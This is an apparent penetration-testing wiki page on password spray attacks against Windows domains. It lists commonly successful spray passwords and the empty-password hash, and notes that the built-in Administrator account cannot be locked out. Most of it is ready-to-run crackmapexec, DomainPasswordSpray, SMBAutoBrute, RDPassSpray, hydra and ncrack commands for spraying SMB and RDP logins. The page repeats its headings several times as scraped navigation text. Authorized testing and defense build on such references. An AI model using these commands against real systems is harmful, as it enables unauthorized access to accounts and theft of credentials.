Password Spray Attack

Password spray attacks use one password against multiple users, usually gathered in a users wordlist.

They are also preferred from brute-force attacks due to prevention of account lockouts.

TIP: The builtin Administrator account (RID:500) cannot be locked out of the system no matter how many failed logon attempts it accumulates.

Tools: hydra, RDPassSpray.py, MailSniper, SprayingToolkit, Metasploit (auxiliary/scanner/smb/smb_login) example

Most of the time the best passwords to spray are :

P@ssw0rd01 , Password123 , Password1 , Hello123 , mimikatz
Welcome1 / Welcome01
$Companyname1 : $Microsoft1
SeasonYear : Winter2019* , Spring2020! , Summer2018? , Summer2020 , July2020!
Default AD password with simple mutations such as number-1, special character iteration (*,?,!,#)
Empty Password (Hash:31d6cfe0d16ae931b73c59d7e0c089c0)

Spray a pre-generated passwords list

1) Using crackmapexec and mp64 to generate passwords and spray them against SMB services on the network.

crackmapexec smb 10.0.0.1/24 -u Administrator -p '(./mp64.bin Pass@wor?l?a)'

2) Using DomainPasswordSpray to spray a password against all users of a domain https://github.com/dafthack/DomainPasswordSpray

Create a userlist

Get-ADUser -Properties name -Filter * | Select-Object -ExpandProperty name | Out-File users.txt

Use Invoke-DomainPasswordSpray

Invoke-DomainPasswordSpray -Password Summer2021! -Verbose (Automatically creates a userlist from the users in the domain and sprays the password)

Invoke-DomainPasswordSpray -UserList users.txt -Domain domain-name -PasswordList passlist.txt -OutFile sprayed-creds.txt

3) SMBAutoBrute https://github.com/Shellntel/scripts/blob/master/Invoke-SMBAutoBrute.ps1

Invoke-SMBAutoBrute -UserList "C:\ProgramData\admins.txt" -PasswordList "Password1"

Spray passwords against the RDP service

1) Using RDPassSpray to target RDP services https://github.com/xFreed0m/RDPassSpray

python3 RDPassSpray.py -u [USERNAME] -p [PASSWORD] -d [DOMAIN] -t [TARGET IP]

2) Hydra

hydra -t 1 -V -f -l administrator -P /usr/share/wordlists/rockyou.txt rdp://IP_ADDRESS

3) ncrack

ncrack –connection-limit 1 -vv --user administrator -P password-file.txt rdp://IP_ADDRESS

BadPwdCount Attribute

The number of times the user tried to log on to the account using an incorrect password. A value of 0 indicates that the value is unknown.

crackmapexec ldap 10.0.2.11 -u 'username' -p 'password' --kdcHost 10.0.2.11 --users

PreviousPassword Attacks tips and tricks NextPre-Created Computer Account password

Last updated 5 months ago

hashtagPassword spray attacks use one password against multiple users, usually gathered in a users wordlist.

hashtagThey are also preferred from brute-force attacks due to prevention of account lockouts.

hashtagTIP: The builtin Administrator account (RID:500) cannot be locked out of the system no matter how many failed logon attempts it accumulates.

hashtagTools: hydra, RDPassSpray.py, MailSniper, SprayingToolkit, Metasploit (auxiliary/scanner/smb/smb_login) example

hashtagMost of the time the best passwords to spray are :

hashtagSpray a pre-generated passwords list

hashtag1) Using crackmapexec and mp64 to generate passwords and spray them against SMB services on the network.

hashtag2) Using DomainPasswordSpray to spray a password against all users of a domain https://github.com/dafthack/DomainPasswordSpray

hashtag3) SMBAutoBrute https://github.com/Shellntel/scripts/blob/master/Invoke-SMBAutoBrute.ps1

hashtagSpray passwords against the RDP service

hashtag1) Using RDPassSpray to target RDP services https://github.com/xFreed0m/RDPassSpray

hashtag2) Hydra

hashtag3) ncrack

hashtagBadPwdCount Attribute

hashtagThe number of times the user tried to log on to the account using an incorrect password. A value of 0 indicates that the value is unknown.

Password spray attacks use one password against multiple users, usually gathered in a users wordlist.

They are also preferred from brute-force attacks due to prevention of account lockouts.

TIP: The builtin Administrator account (RID:500) cannot be locked out of the system no matter how many failed logon attempts it accumulates.

Tools: hydra, RDPassSpray.py, MailSniper, SprayingToolkit, Metasploit (auxiliary/scanner/smb/smb_login) example

Most of the time the best passwords to spray are :

Spray a pre-generated passwords list

1) Using crackmapexec and mp64 to generate passwords and spray them against SMB services on the network.

2) Using DomainPasswordSpray to spray a password against all users of a domain https://github.com/dafthack/DomainPasswordSpray

3) SMBAutoBrute https://github.com/Shellntel/scripts/blob/master/Invoke-SMBAutoBrute.ps1

Spray passwords against the RDP service

1) Using RDPassSpray to target RDP services https://github.com/xFreed0m/RDPassSpray

2) Hydra

3) ncrack

BadPwdCount Attribute

The number of times the user tried to log on to the account using an incorrect password. A value of 0 indicates that the value is unknown.